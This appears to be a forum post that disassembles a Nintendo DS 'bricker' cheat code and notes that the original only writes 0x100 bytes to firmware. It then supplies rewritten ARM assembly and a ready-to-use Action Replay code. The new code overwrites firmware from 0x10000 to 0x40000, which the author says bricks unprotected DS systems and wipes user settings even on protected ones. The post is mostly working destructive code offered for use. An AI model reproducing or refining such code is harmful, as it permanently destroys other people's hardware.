I actually stepped through this code in no$gba.
Here is what actually happens.
Code:
02780100 EB01D8F0 bl 27F64C8h ;Set the firmware write enable latch
02780104 E3A0050E mov r0,3800000h ;
02780108 EB01D8C1 bl 27F6414h ;Verify the Write enable latch is set.
0278010C E3110002 tst r1,2h ;
02780110 0AFFFFFB beq 2780104h ;If for some reason, the write enable latch is not set, it will lock up forever at this point, without any DS bricking action.
02780114 E3A00801 mov r0,10000h ;
02780118 E3A01803 mov r1,30000h ;
0278011C E3A02402 mov r2,2000000h ;
02780120 EB01D7D9 bl 27F608Ch ; Overwrite address 0x10000 with 0x100 bytes of data from ram address 0x2000000.
02780124 EAFFFFFE b 2780124h ;
From disassembling the firmware writing routine, I have determined that in order to completely erase and overwrite the firmware, prior to the branch point, a little bit more work is required.
The assembler code for this is
Code:
mov r4,10000h
bl 27F64C8
Wait_latch_enabled:
mov r0,3800000
bl 27F6414h
tst r1,2h
beq Wait_latch_enabled
mov r0, r4
Firmware_write_loop:
mov r1, 100h
mov r2, 2000000h
bl 27F608Ch
add r4, r4, 100h
cmp r4, 40000h
blt Firmware_write_loop
Endless_loop:
b Endless_loop
In action replay code form, that is
94000130 FCFF0000
037FB8DC E51FF004
037FB8E0 02780100
D2000000 00000000
E2780100 00000038
E3A04801 EB01D8EF
E3A0050E EB01D8C0
E3110002 0AFFFFFB
E1A00004 E3A01C01
E3A02402 EB01D7D8
E2844C01 E3540702
BAFFFFF3 EAFFFFFE
Because the original bricker code only wrote 0x100 bytes to firmware address 0x10000, anybody with a bricker proof DS would notice no effects whatsoever. Not exactly what the original code creator had intended. This one will brick any DS systems that are not bricker proof, and even if the DS is bricker proof, still overwrite the personal settings area of the firmware.